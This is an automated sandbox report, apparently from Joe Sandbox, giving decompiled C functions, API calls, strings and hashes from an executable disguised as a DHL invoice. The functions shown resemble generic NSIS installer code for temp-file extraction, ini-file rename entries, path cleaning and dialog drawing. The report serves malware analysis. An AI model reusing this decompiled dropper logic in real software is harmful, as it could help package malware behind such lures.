Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: c6345d7c5fceae9535b237699f25ce67e7fd4968e8456bbccafdc44fed7c7a8a
Instruction ID: 3af209a9edb156689bef41e0a63d31b37659a4d6f6412c5d0cf3c0f243fc5647
Opcode Fuzzy Hash: c6345d7c5fceae9535b237699f25ce67e7fd4968e8456bbccafdc44fed7c7a8a
Instruction Fuzzy Hash: E041AFB20083509FC7159F65CD4496BBBE9FF88715F140A2EF995A22A1C734DD04CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00406306 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 124
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00406306() {
				long _t10;
				void* _t32;
				void* _t36;
				long _t37;
				intOrPtr* _t39;
				void* _t43;
				WCHAR* _t44;
				long _t46;
				int _t48;
				void* _t49;

				_t44 =  *(_t49 + 0x14);
				 *0x4319c0 = 0x55004e;
				 *0x4319c4 = 0x4c;
				if(_t44 == 0) {
					L3:
					_t10 = GetShortPathNameW( *(_t49 + 0x1c), 0x4311c0, 0x400);
					if(_t10 != 0 && _t10 <= 0x400) {
						_t48 = wsprintfA(0x430dc0, "%ls=%ls\r\n", 0x4319c0, 0x4311c0);
						_push( *((intOrPtr*)( *0x435a10 + 0x128)));
						_push(0x4311c0);
						E00405EBA();
						_t10 = E0040691B(0x4311c0, 0xc0000000, 4);
						_t32 = _t10;
						if(_t32 != 0xffffffff) {
							_t46 = GetFileSize(_t32, 0);
							_t4 = _t48 + 0xa; // 0xa
							_t35 = _t4 + _t46;
							_t43 = GlobalAlloc(0x40, _t4 + _t46);
							if(_t43 != 0 && E00406948(_t35, _t32, _t43, _t46) != 0) {
								if(E00406B36(_t43, "[Rename]\r\n") != 0) {
									_t36 = E00406B36(_t16 + 0xa, "\n[");
									if(_t36 == 0) {
										goto L10;
									} else {
										_t39 = _t43 + _t46;
										while(_t39 > _t36) {
											 *((char*)(_t39 + _t48)) =  *_t39;
											_t39 = _t39 - 1;
										}
										_t37 = _t36 - _t43 + 1;
										goto L11;
									}
									goto L13;
								} else {
									lstrcpyA(_t43 + _t46, "[Rename]\r\n");
									_t46 = _t46 + 0xa;
									L10:
									_t37 = _t46;
								}
								L11:
								E004066B4(_t37 + _t43, 0x430dc0, _t48);
								SetFilePointer(_t32, 0, 0, 0);
								E00406A0B(_t37, _t32, _t43, _t46 + _t48);
								GlobalFree(_t43);
							}
							_t10 = CloseHandle(_t32);
						}
					}
				} else {
					CloseHandle(E0040691B(_t44, 0, "true"));
					_t10 = GetShortPathNameW(_t44, 0x4319c0, 0x400);
					if(_t10 != 0 && _t10 <= 0x400) {
						goto L3;
					}
				}
				L13:
				return _t10;
			}

0x00406309
0x00406312
0x00406321
0x00406334
0x0040635c
0x00406367
0x0040636b
0x00406394
0x00406396
0x0040639c
0x0040639d
0x004063aa
0x004063af
0x004063b4
0x004063c3
0x004063c5
0x004063c8
0x004063d3
0x004063d7
0x004063f2
0x0040644f
0x00406453
0x00000000
0x00406455
0x00406455
0x00406460
0x0040645c
0x0040645f
0x0040645f
0x00406466
0x00000000
0x00406466
0x00000000
0x004063f4
0x004063fd
0x00406403
0x00406406
0x00406406
0x00406406
0x00406408
0x00406412
0x0040641d
0x00406429
0x0040642f
0x0040642f
0x00406436
0x00406436
0x004063b4
0x00406336
0x00406341
0x0040634a
0x0040634e
0x00000000
0x00000000
0x0040634e
0x0040643c
0x00406440

APIs

CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,00000000,?,0040625E,?,?), ref: 00406341
GetShortPathNameW.KERNEL32(00000000,004319C0,00000400), ref: 0040634A
GetShortPathNameW.KERNEL32(?,004311C0,00000400), ref: 00406367
wsprintfA.USER32 ref: 00406385
GetFileSize.KERNEL32(00000000,00000000,004311C0,C0000000,00000004,004311C0,?), ref: 004063BD
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 004063CD
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004063FD
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00430DC0,00000000,-0000000A,00409984,00000000,[Rename],00000000,00000000,00000000), ref: 0040641D
GlobalFree.KERNEL32(00000000), ref: 0040642F
CloseHandle.KERNEL32(00000000), ref: 00406436

Part of subcall function 0040691B: GetFileAttributesW.KERNELBASE(00000003,0040342F,C:\Users\user\Desktop\DHL_#U53d1#U7968.exe,80000000,00000003,?,?,?,?,?), ref: 0040691F
Part of subcall function 0040691B: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040693F

Strings

%ls=%ls, xrefs: 0040637B
[Rename], xrefs: 004063E5, 004063F4

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShort$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2900126502-461813615
Opcode ID: 0a571fe3ba45ea2247c21dd7af0bbb717ae824af8d2c55462ad76218f2181cd1
Instruction ID: 3caf73f0ff98a748f1a35ad4b0faf92cdaa7f83aa24985268d6d9c0dc650f438
Opcode Fuzzy Hash: 0a571fe3ba45ea2247c21dd7af0bbb717ae824af8d2c55462ad76218f2181cd1
Instruction Fuzzy Hash: C93105B12012117AE7206B258D99FAB3A5CEF45748F16053AF903F62D3E63D9C11867C

Uniqueness

Uniqueness Score: -1.00%

Function 00402BA3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00402BA3(intOrPtr __ebp, void* _a4, intOrPtr _a8, void* _a12, WCHAR* _a16, long _a20, void* _a24, void* _a32, void* _a44, WCHAR* _a76) {
				void* _v0;
				void* _v4;
				void* _v8;
				void* _v16;
				void* _v40;
				long _t34;
				WCHAR* _t46;
				void* _t49;
				void* _t50;
				void* _t51;
				void* _t52;
				void* _t54;
				void* _t55;
				void* _t56;
				void* _t58;
				void _t59;
				intOrPtr _t60;
				void* _t62;

				_t60 = __ebp;
				_a24 = 0xfffffd66;
				_t46 = E0040303E(_t51, 0xfffffff0);
				_a76 = _t46;
				if(E00406E03(_t46) == 0) {
					E0040303E(__edx, 0xffffffed);
				}
				E00406B9D(_t46);
				_t52 = E0040691B(_t46, 0x40000000, 2);
				_a12 = _t52;
				if(_t52 != 0xffffffff) {
					_t31 = _a44;
					 *(_t62 + 0x44) = _a44;
					if( *(_t62 + 0x30) != _t60) {
						_t34 =  *0x435a08;
						_a20 = _t34;
						_t58 = GlobalAlloc(0x40, _t34);
						_a24 = _t58;
						if(_t58 == 0) {
							_t31 =  *(_t62 + 0x44);
						} else {
							E00403131(_t60);
							E0040311B(_t58, _a16);
							_t54 = GlobalAlloc(0x40,  *(_t62 + 0x30));
							 *(_t62 + 0x44) = _t54;
							if(_t54 != 0) {
								E00403148(_a44, _t60, _t54,  *(_t62 + 0x30));
								if( *_t54 != 0) {
									_t49 = _t58;
									do {
										_t59 =  *_t54;
										_t55 = _t54 + 8;
										E004066B4( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t59);
										_t54 = _t55 + _t59;
									} while ( *_t54 != 0);
									_t46 =  *(_t62 + 0x50);
									_t58 = _a24;
								}
								GlobalFree( *(_t62 + 0x44));
							}
							_t52 =  *(_t62 + 0x20);
							E00406A0B(_t50, _t52, _t58, _a20);
							_t31 = GlobalFree(_t58) | 0xffffffff;
						}
					}
					_a8 = E00403148(_t31, _t52, _t60, _t60);
					CloseHandle(_t52);
				}
				_t56 = 0xfffffff3;
				if(_a24 >= _t60) {
					_t46 = _a16;
				} else {
					_t56 = 0xffffffef;
					DeleteFileW(_t46);
					_t46 = 1;
				}
				_push("C:\Users\Arthur\AppData\Local\Temp\nsh6AA5.tmp\System.dll");
				_push(_t56);
				E00405D3A();
				 *0x435ac8 =  *0x435ac8 + _t46;
				return 0;
			}

0x00402ba3
0x00402ba5
0x00402bb2
0x00402bb5
0x00402bc0
0x00402bc4
0x00402bc4
0x00402bca
0x00402bdc
0x00402bde
0x00402be5
0x00402beb
0x00402bef
0x00402bf7
0x00402bfd
0x00402c05
0x00402c0f
0x00402c11
0x00402c17
0x00402c9f
0x00402c1d
0x00402c1e
0x00402c28
0x00402c39
0x00402c3b
0x00402c41
0x00402c4d
0x00402c55
0x00402c57
0x00402c59
0x00402c59
0x00402c5e
0x00402c66
0x00402c6b
0x00402c6d
0x00402c72
0x00402c76
0x00402c76
0x00402c7e
0x00402c7e
0x00402c88
0x00402c8e
0x00402c9a
0x00402c9a
0x00402c17
0x00402cad
0x00402cb1
0x00402cb1
0x00402cb9
0x00402cbe
0x00402ccf
0x00402cc0
0x00402cc2
0x00402cc4
0x00402ccc
0x00402ccc
0x00402cd3
0x00402cd8
0x00402345
0x00402ea5
0x00402eb7

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402C09
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402C33
GlobalFree.KERNEL32(?), ref: 00402C7E
GlobalFree.KERNEL32(00000000), ref: 00402C94
CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,40000000,00000002,00000000,00000000), ref: 00402CB1
DeleteFileW.KERNEL32(00000000,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402CC4

Strings

C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll, xrefs: 00402CD3

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID: C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll
API String ID: 2667972263-4031736819
Opcode ID: 21bf38eaf766e30db3ad4f67b39d13bf90a53ba7524260bc4dffed712f826359
Instruction ID: 23d93ea21af668beabbcb9178b0b7634ed911faf56d8c64a437eebf92f001ab7
Opcode Fuzzy Hash: 21bf38eaf766e30db3ad4f67b39d13bf90a53ba7524260bc4dffed712f826359
Instruction Fuzzy Hash: B2310471508351ABD310AF65CD48E1FBBE8AF89714F100A3EF5A1772D2C37899018BAA

Uniqueness

Uniqueness Score: -1.00%

Function 00406D3D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00406D3D(WCHAR* _a4) {
				signed short _t5;
				signed int _t8;
				signed int _t9;
				signed short _t18;
				signed short _t20;
				signed int _t21;
				signed short _t22;
				WCHAR* _t23;
				WCHAR* _t24;
				void* _t25;
				WCHAR* _t26;

				_t24 = _a4;
				_t22 = 0x5c;
				_t5 =  *_t24 & 0x0000ffff;
				_t20 = _t5;
				if(_t5 == _t22) {
					_t20 = _t22;
					if(_t24[1] == _t22 && _t24[2] == 0x3f && _t24[3] == _t22) {
						_t24 =  &(_t24[4]);
						_t20 =  *_t24 & 0x0000ffff;
					}
				}
				_t18 = _t20 & 0x0000ffff;
				if(_t20 != 0) {
					_t18 = _t20 & 0x0000ffff;
					if(E00406E03(_t24) != 0) {
						_t24 =  &(_t24[2]);
						_t18 =  *_t24 & 0x0000ffff;
					}
				}
				_t26 = _t24;
				_t23 = _t24;
				if(_t18 == 0) {
					L14:
					 *_t23 = 0;
					_t25 = 0x5c;
					while(1) {
						_push(_t23);
						_push(_t26);
						_t23 = CharPrevW();
						_t8 =  *_t23 & 0x0000ffff;
						if(_t8 != 0x20 && _t8 != _t25) {
							break;
						}
						_t8 = 0;
						 *_t23 = 0;
						if(_t26 < _t23) {
							continue;
						}
						break;
					}
					return _t8;
				} else {
					_t9 = _t18 & 0x0000ffff;
					do {
						if(_t9 > 0x1f &&  *((short*)(E004065F6(L"*?|<>/\":", _t9))) == 0) {
							E004066B4(_t23, _t24, CharNextW(_t24) - _t24 >> 1);
							_t23 = CharNextW(_t23);
						}
						_t24 = CharNextW(_t24);
						_t21 =  *_t24 & 0x0000ffff;
						_t9 = _t21;
					} while (_t21 != 0);
					goto L14;
				}
			}

0x00406d40
0x00406d47
0x00406d48
0x00406d4b
0x00406d50
0x00406d52
0x00406d58
0x00406d67
0x00406d6a
0x00406d6a
0x00406d58
0x00406d6d
0x00406d73
0x00406d76
0x00406d80
0x00406d82
0x00406d85
0x00406d85
0x00406d80
0x00406d88
0x00406d8a
0x00406d8f
0x00406dd4
0x00406dd8
0x00406ddb
0x00406ddc
0x00406ddc
0x00406ddd
0x00406de4
0x00406de6
0x00406dec
0x00000000
0x00000000
0x00406df3
0x00406df5
0x00406dfa
0x00000000
0x00000000
0x00000000
0x00406dfa
0x00406e00
0x00406d91
0x00406d91
0x00406d9a
0x00406d9e
0x00406dbb
0x00406dc3
0x00406dc3
0x00406dc8
0x00406dca
0x00406dcd
0x00406dcf
0x00000000
0x00406d9a

APIs

CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,76383420,004039C2), ref: 00406DB2
CharNextW.USER32(?,?,?,00000000), ref: 00406DC1
CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,76383420,004039C2), ref: 00406DC6
CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,76383420,004039C2), ref: 00406DDE

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406D44
C:\Users\user\AppData\Local\Temp\, xrefs: 00406D3D, 00406D3F
*?|<>/":, xrefs: 00406DA1

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
API String ID: 589700163-2188270913
Opcode ID: 0b6213c0c1622fb53aee38363b717c73aa2e600d62468f8e3aca7b6a41b68933
Instruction ID: 9b03febb742ef4485f2caa0616bf8b5dba6ff04d2a2b11022b5674ddd7f14081
Opcode Fuzzy Hash: 0b6213c0c1622fb53aee38363b717c73aa2e600d62468f8e3aca7b6a41b68933
Instruction Fuzzy Hash: 4E110211B0022566DA306B2A9C4097B72E8DFA9761746443BF9C6A32C0F77D8CA1D2B8

Uniqueness

Uniqueness Score: -1.00%

Function 0040575B Relevance: 12.1, APIs: 8, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040575B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				void* _t38;
				signed char _t40;
				signed char _t42;
				long _t51;
				long _t52;
				long* _t55;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					_t38 = 0;
				} else {
					_t55 = GetWindowLongW(_a12, 0xffffffeb);
					if(_t55 == 0 || _t55[2] > 1 || _t55[4] > 2) {
						goto L18;
					} else {
						_t40 = _t55[5];
						if((_t40 & 0xffffffe0) != 0) {
							goto L18;
						} else {
							_t51 =  *_t55;
							if((_t40 & 0x00000002) != 0) {
								_t51 = GetSysColor(_t51);
								_t40 = _t55[5];
							}
							if((_t40 & 0x00000001) != 0) {
								SetTextColor(_a8, _t51);
							}
							SetBkMode(_a8, _t55[4]);
							_t42 = _t55[5];
							_t52 = _t55[1];
							_v16.lbColor = _t52;
							if((_t42 & 0x00000008) != 0) {
								_t52 = GetSysColor(_t52);
								_t42 = _t55[5];
								_v16.lbColor = _t52;
							}
							if((_t42 & 0x00000004) != 0) {
								SetBkColor(_a8, _t52);
								_t42 = _t55[5];
							}
							if((_t42 & 0x00000010) != 0) {
								_v16.lbStyle = _t55[2];
								if(_t55[3] != 0) {
									DeleteObject(_t55[3]);
								}
								_t55[3] = CreateBrushIndirect( &_v16);
							}
							_t38 = _t55[3];
						}
					}
				}
				return _t38;
			}

0x0040576d
0x0040582e
0x0040582e
0x00405773
0x0040577e
0x00405782
0x00000000
0x0040579c
0x0040579c
0x004057a4
0x00000000
0x004057aa
0x004057aa
0x004057ae
0x004057b7
0x004057b9
0x004057b9
0x004057be
0x004057c4
0x004057c4
0x004057d0
0x004057d6
0x004057d9
0x004057dc
0x004057e1
0x004057ea
0x004057ec
0x004057ef
0x004057ef
0x004057f4
0x004057fa
0x00405800
0x00405800
0x00405805
0x0040580e
0x00405811
0x00405816
0x00405816
0x00405826
0x00405826
0x00405829
0x00405829
0x004057a4
0x00405782
0x00405832

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00405778
GetSysColor.USER32 ref: 004057B1
SetTextColor.GDI32(?), ref: 004057C4
SetBkMode.GDI32(?,?), ref: 004057D0
GetSysColor.USER32(?), ref: 004057E4
SetBkColor.GDI32(?,?), ref: 004057FA
DeleteObject.GDI32(?), ref: 00405816
CreateBrushIndirect.GDI32(?), ref: 00405820

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 884efe4836094bb20a6f18f16c634fbe29c57d0ac42d5c945227a46e33033bd0
Instruction ID: d6878141ad4b6a1f495ba237af706d2ee8e98f75713b616aff0e98366caa8665
Opcode Fuzzy Hash: 884efe4836094bb20a6f18f16c634fbe29c57d0ac42d5c945227a46e33033bd0
Instruction Fuzzy Hash: 64210775600B059FDB34AF28E94895B7BF8EF05710700CA3AE896A27A1D735EC14CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040291D Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 166
fileCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040291D(void* __edi, void* __esi, signed int __ebp, void* _a4, void* _a8, void* _a12, char _a16, signed int _a20, long _a24, void* _a28, long _a32, intOrPtr _a36, void* _a48, intOrPtr _a52, void* _a56, signed int _a64, intOrPtr _a68, short _a72, int _a76) {
				signed int _t61;
				long _t63;
				void* _t73;

				_t63 = 2;
				_a20 = __ebp;
				_a32 = _t63;
				_t73 = E00403002(_t63) - 1;
				if(_t73 < 0) {
					_t61 = _a16;
					goto L33;
				} else {
					__ecx = 0x3ff;
					_a24 = __eax;
					if( *__edi == __bp) {
						L25:
						__eax = _a20;
						__ecx = 0;
						__ebx = 0;
						 *((short*)(__esi + _a20 * 2)) = __cx;
						_t61 = 0 | _t73 == 0x00000000;
						L33:
						 *0x435ac8 =  *0x435ac8 + _t61;
					} else {
						_a64 = __ebp;
						__ecx = E00406C25(__edi);
						_a24 = __ecx;
						if(_a20 > __ebp) {
							_a68 = 0xd;
							__edi = __ebp;
							do {
								if(_a36 != 0x39) {
									if(_a52 != __ebp || __edi != 0) {
										L18:
										__eax =  &_a72;
										if(E00406948(__ecx, __ecx,  &_a72, 2) == 0) {
											goto L25;
										} else {
											goto L19;
										}
									} else {
										if(E00406484(__ecx, __ebp) < 0) {
											goto L25;
										} else {
											__ecx = _a28;
											goto L18;
										}
									}
								} else {
									_push(__ebp);
									__eax =  &_a76;
									_push( &_a76);
									__eax = 2;
									 &_a76 - _a52 =  &_a16;
									if(ReadFile(__ecx,  &_a16,  &_a76 - _a52, ??, ??) == 0) {
										goto L25;
									} else {
										__ecx = _a76;
										_a32 = __ecx;
										if(__ecx == 0) {
											goto L25;
										} else {
											__eax = _a16 & 0x000000ff;
											_a72 = _a16 & 0x000000ff;
											if(_a52 != __ebp) {
												L31:
												__ax & 0x0000ffff = E0040661F(__esi, __ax & 0x0000ffff);
											} else {
												 &_a72 =  &_a16;
												if(MultiByteToWideChar(__ebp, 8,  &_a16, __ecx,  &_a72, __ebx) != 0) {
													L19:
													__ecx = _a32;
													__eax = _a72;
												} else {
													__ecx = _a32;
													__edx = __ecx;
													__edx =  ~__ecx;
													while(1) {
														_t22 =  &_a76;
														 *_t22 = _a76 - 1;
														__eax = 0xfffd;
														_a72 = 0xfffd;
														if( *_t22 == 0) {
															goto L20;
														}
														__ecx = __ecx - 1;
														__edx = __edx + 1;
														_a32 = __ecx;
														 *(__esp + 0x60) = __edx;
														SetFilePointer(_a28, __edx, __ebp, __ebx) =  &_a72;
														__eax =  &_a16;
														__eax = MultiByteToWideChar(__ebp, 8,  &_a16, _a76,  &_a72, __ebx);
														__ecx = _a32;
														__edx =  *(__esp + 0x50);
														if(__eax == 0) {
															continue;
														} else {
															goto L19;
														}
														goto L20;
													}
												}
												L20:
												if(_a52 != __ebp) {
													goto L31;
												} else {
													__edx = 0xd;
													__edx = 0xa;
													if(_a64 == __dx || _a64 == __dx) {
														if(_a64 == __ax || __ax != _a68 && __ax != __dx) {
															__eax = SetFilePointer(_a28, __ecx, __ebp, __ebx);
														} else {
															 *(__esi + __edi * 2) = __ax;
															_a20 = __edi;
														}
														goto L25;
													} else {
														 *(__esi + __edi * 2) = __ax;
														__edi = __edi + 1;
														__eax = __ax & 0x0000ffff;
														_a20 = __edi;
														_a64 = __ax & 0x0000ffff;
														if(__ax == 0) {
															goto L25;
														} else {
															goto L24;
														}
													}
												}
											}
										}
									}
								}
								goto L34;
								L24:
								__ecx = _a28;
							} while (__edi < _a24);
						}
						goto L25;
					}
				}
				L34:
				return 0;
			}

0x0040291f
0x00402921
0x00402925
0x00402932
0x00402934
0x00402ea1
0x00000000
0x0040293a
0x0040293a
0x00402944
0x0040294b
0x00402aa2
0x00402aa2
0x00402aa6
0x00402aa8
0x00402aac
0x00401a10
0x00402ea5
0x00402ea5
0x00402951
0x00402952
0x0040295b
0x0040295d
0x00402965
0x0040296b
0x00402973
0x00402975
0x0040297a
0x00402a37
0x00402a4c
0x00402a4e
0x00402a5b
0x00000000
0x00000000
0x00000000
0x00000000
0x00402a3d
0x00402a46
0x00000000
0x00402a48
0x00402a48
0x00000000
0x00402a48
0x00402a46
0x00402980
0x00402980
0x00402981
0x00402985
0x00402988
0x0040298e
0x0040299c
0x00000000
0x004029a2
0x004029a2
0x004029a6
0x004029ac
0x00000000
0x004029b2
0x004029b2
0x004029b7
0x004029bf
0x00402ae4
0x00402ae9
0x004029c5
0x004029cc
0x004029dc
0x00402a5d
0x00402a5d
0x00402a61
0x004029de
0x004029de
0x004029e2
0x004029e4
0x004029e6
0x004029e6
0x004029e6
0x004029eb
0x004029f0
0x004029f4
0x00000000
0x00000000
0x004029f7
0x004029f8
0x004029ff
0x00402a03
0x00402a0e
0x00402a17
0x00402a1f
0x00402a25
0x00402a29
0x00402a2f
0x00000000
0x00402a31
0x00000000
0x00402a31
0x00000000
0x00402a2f
0x004029e6
0x00402a65
0x00402a69
0x00000000
0x00402a6b
0x00402a6d
0x00402a75
0x00402a76
0x00402aba
0x00402adc
0x00402ac8
0x00402ac8
0x00402acd
0x00402acd
0x00000000
0x00402a7f
0x00402a7f
0x00402a83
0x00402a84
0x00402a87
0x00402a8b
0x00402a92
0x00000000
0x00000000
0x00000000
0x00000000
0x00402a92
0x00402a76
0x00402a69
0x004029bf
0x004029ac
0x0040299c
0x00000000
0x00402a94
0x00402a94
0x00402a98
0x00402975
0x00000000
0x00402965
0x0040294b
0x00402eab
0x00402eb7

APIs

ReadFile.KERNEL32(00000000,?,?,?), ref: 00402994
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004029D4
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402A07
MultiByteToWideChar.KERNEL32(?,00000008,?,?,00000001,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402A1F
SetFilePointer.KERNEL32(?,?,?,00000001,00000000,?,00000002), ref: 00402ADC

Strings

9, xrefs: 00402975

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

